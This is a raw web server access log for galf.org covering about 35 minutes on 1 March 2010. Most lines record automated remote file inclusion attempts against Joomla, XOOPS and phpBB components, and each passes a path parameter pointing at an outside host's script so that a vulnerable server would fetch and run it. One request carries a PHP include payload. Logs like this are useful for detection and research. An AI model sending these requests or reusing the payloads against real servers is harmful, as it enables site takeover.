87.106.132.3 - - [01/Mar/2010:00:40:46 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:46 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:48 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:48 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:40:48 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:49 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:49 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:49 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:40:50 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:40:50 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:41:02 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:41:04 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:41:05 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:41:06 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:41:07 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:41:07 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:41:07 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:41:08 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:41:09 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:41:09 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:41:10 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:41:21 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:41:42 -0800] "GET /logs/access_090831.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:42:04 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:43:34 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:43:34 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:43:34 -0800] "GET /logs/access_091123.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [01/Mar/2010:00:44:05 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:44:20 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:44:20 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:44:20 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:44:23 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:44:23 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:44:23 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [01/Mar/2010:00:44:51 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.120 - - [01/Mar/2010:00:44:51 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.120 - - [01/Mar/2010:00:44:51 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.120 - - [01/Mar/2010:00:44:56 -0800] "GET /logs/access_091221.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [01/Mar/2010:00:44:56 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [01/Mar/2010:00:44:56 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:45:05 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:45:06 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:47:05 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:47:08 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:49:02 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:49:24 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:49:24 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:49:24 -0800] "GET /logs/access_090810.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:49:24 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:49:30 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [01/Mar/2010:00:49:38 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:49:52 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:49:53 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:49:53 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:50:19 -0800] "GET /logs/access_090817.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:51:24 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:51:44 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [01/Mar/2010:00:52:22 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:55:47 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:56:53 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [01/Mar/2010:00:56:54 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [01/Mar/2010:00:56:55 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [01/Mar/2010:00:57:04 -0800] "GET /logs/access_090817.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:59:54 -0800] "GET /logs/access_100111.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:59:54 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:00:59:55 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
67.195.114.35 - - [01/Mar/2010:00:59:57 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.114.35 - - [01/Mar/2010:00:59:57 -0800] "GET /cendoc/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
193.111.95.42 - - [01/Mar/2010:01:03:39 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.meuveiculonovo.com//includes/Cache/ts?????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
193.111.95.42 - - [01/Mar/2010:01:03:40 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.meuveiculonovo.com//includes/Cache/ts?????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
211.63.219.132 - - [01/Mar/2010:01:05:05 -0800] "GET /logs/access_100222.log%20%20//common/db.php?commonpath=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.219.132 - - [01/Mar/2010:01:05:05 -0800] "GET /logs//common/db.php?commonpath=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.219.132 - - [01/Mar/2010:01:05:06 -0800] "GET /common/db.php?commonpath=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:07:39 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:07:40 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:07:40 -0800] "GET /logs/access_100125.log//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:07:55 -0800] "GET /logs/access_100125.log//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:07:55 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:07:55 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:08:41 -0800] "GET /logs/access_100118.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:08:41 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:08:41 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [01/Mar/2010:01:09:51 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [01/Mar/2010:01:11:13 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
207.46.204.240 - - [01/Mar/2010:01:11:22 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:12:12 -0800] "GET /?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:12:12 -0800] "GET /logs/access_090914.log/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:12:12 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:12:19 -0800] "GET /logs/access_090914.log/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:12:19 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:12:19 -0800] "GET /?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:12:30 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:12:30 -0800] "GET /logs/access_091102.log//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:12:30 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:12:53 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:12:53 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:12:53 -0800] "GET /logs/access_091102.log//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:13:06 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:13:06 -0800] "GET /logs/access_100125.log%20%20//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:13:06 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:13:10 -0800] "GET /logs/access_100125.log//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:13:14 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:13:14 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:13:14 -0800] "GET /logs/access_100125.log%20%20//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.30.37 - - [01/Mar/2010:01:13:36 -0800] "GET /logs/access_100125.log//modules/xfsection/modify.php?dir_module=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [01/Mar/2010:01:14:14 -0800] "GET /components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
216.119.103.16 - - [01/Mar/2010:01:14:14 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:15:04 -0800] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:15:04 -0800] "GET /logs/access_100222.log%20%20///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:15:04 -0800] "GET /logs///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:15:04 -0800] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.12.33.30 - - [01/Mar/2010:01:15:04 -0800] "GET /logs///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.12.33.30 - - [01/Mar/2010:01:15:04 -0800] "GET /logs/access.log%20%20///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.233.162.101 - - [01/Mar/2010:01:16:03 -0800] "GET /logs/access_090921.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:16:03 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:16:03 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:16:04 -0800] "GET /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [01/Mar/2010:01:16:04 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
